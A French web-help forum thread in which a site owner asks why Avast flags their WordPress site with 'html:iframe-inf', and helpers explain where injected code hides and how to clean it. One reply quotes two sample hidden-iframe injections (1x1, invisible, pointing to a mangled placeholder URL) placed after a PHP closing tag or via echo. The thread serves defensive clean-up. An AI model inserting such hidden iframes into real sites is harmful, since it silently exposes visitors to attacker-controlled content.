Mon site est infecté ?

Résolu/Fermé
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 - 26 oct. 2011 à 17:17
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 - 27 oct. 2011 à 20:39
Bonjour,

J'ai besoin de votre aide, un site d'on je m'occupe a un souci, lorsque les gens se connectent sur le site et qu'ils ont AVAST, une alerte avec comme message :

infection: html:iframe-inf

j'ai vérifié mes pages php mais je n'ai rien trouvé, seul AVAST trouve une alerte.

Mon antivirus : Bitdefender Internet Security 2012, ne m'affiche pas d'alerte lorsque je vais sur le site.

Est-ce qu'il y a des solutions mis à part, tout virer et mettre une ancienne sauvegarde ?

merci


A voir également:

7 réponses

RAD ZONE Messages postés 5224 Date d'inscription samedi 20 janvier 2007 Statut Contributeur Dernière intervention 22 mars 2024 1 353
Modifié par RAD ZONE le 26/10/2011 à 17:36
salut

c est le site que tu appel dans l iframe qui pose probleme !! pas ton site

a+

ps: vide tes caches !!

? La plus grande erreur que puisse faire un homme est d'avoir peur d'en faire une. ?
0
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 137
26 oct. 2011 à 17:40
merci de la réponse mais il n'y a pas d'iframe, voila mon problème. J'ai regardé un peu mes pages php, il n'y a rien.

avec Chrome j'ai fait, inspecter l'élément, j'ai regardé le code et il n'y a pas d'iframe.

merci
0
RAD ZONE Messages postés 5224 Date d'inscription samedi 20 janvier 2007 Statut Contributeur Dernière intervention 22 mars 2024 1 353
26 oct. 2011 à 17:41
c est un wordpress ??
0
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 137
Modifié par Angelneonizz le 26/10/2011 à 18:23
effectivement , j'ai vérifié les pages index, je n'ai rien trouvé
Il n'y a pas de défaite si on sait en tirer des leçons !
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
26 oct. 2011 à 18:41
salut RAD ;)
si c'est un wordpress regardes ici :
https://longuetraine.fr/?article661/wordpress-alerte-de-securite-sur-les-templates-gratuits
télécharges 'TAC' et fais un test ;)
0
RAD ZONE Messages postés 5224 Date d'inscription samedi 20 janvier 2007 Statut Contributeur Dernière intervention 22 mars 2024 1 353
Modifié par RAD ZONE le 26/10/2011 à 19:14
tu as vérifié ces pages !??

index.php

wp-config.php

index.php dans wp-admin

index.php dans wp-contents\ton theme\

default-filters.php dans wp-includes


les insertions peuvent etre misent apres un ?> de fin de php

?>       

<iframe src="htt p:// www.la merde/in.ggi?income10" width=1 height=1 style="visibility:hiden"></iframe>       


ou par une balise echo dans le php

echo"<iframe src=\"ht tp:// www.la merde/in.ggi?income10\" width=1 height=1 style=\"visibility:hiden;position:absolute\"></iframe>"       
?>       


recupere tout les fichiers wordpress sur ton serveur et place les dans un dossier sur ton pc !
change ton password ftp et cpanel et le mieux est d uploader une nouvelle copie de tous les fichiers WordPress après avoir fait les changements nécessaires dans le fichier wp-config.php.!

tu controle ensuite TOUT LES FICHIERS SUR TON PC , avec un soft style TextCrawler

et cherche si il y as une de ces iframes dans les codes !

control tout les plugin !!!

si tu ne trouve rien tu reupload tout sur ton serveur !!

en esperant que la base MySQL ne soit pas infecte par un post , sinon il faudras aussi la nettoyer ! ??

bonne nuit ;-)))))))

? La plus grande erreur que puisse faire un homme est d'avoir peur d'en faire une. ?
0
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 137
26 oct. 2011 à 21:06
merci à tous pour vos réponses.

Grace au plugin Firebug pour firefox j'ai réussi à virer le code qui foutait la merde. Tous les fichiers index.php et le footer.php de mon thème avaient ce code.

J'ai tout remodifié.

BG62 : le thème c'est moi qui l'est fait, donc il n'y a pas de souci de ce coté là.

encore merci
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
27 oct. 2011 à 14:40
alors, exactement : quel était le problème ???
0
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 137
27 oct. 2011 à 16:24
du code PHP inséré dans toutes les pages index.php + dans la page footer de mon thème.
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
27 oct. 2011 à 19:18
qui venait de toi ... ?
0
Angelneonizz Messages postés 784 Date d'inscription mardi 9 décembre 2003 Statut Membre Dernière intervention 19 février 2018 137
27 oct. 2011 à 20:29
non pas du tout, quelqu'un a soit utilisé une faille wordpress soit il a eu un accès au FTP
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
27 oct. 2011 à 20:39
ok .... alors si tout est nettoyé tant mieux c'est le principal ;)
0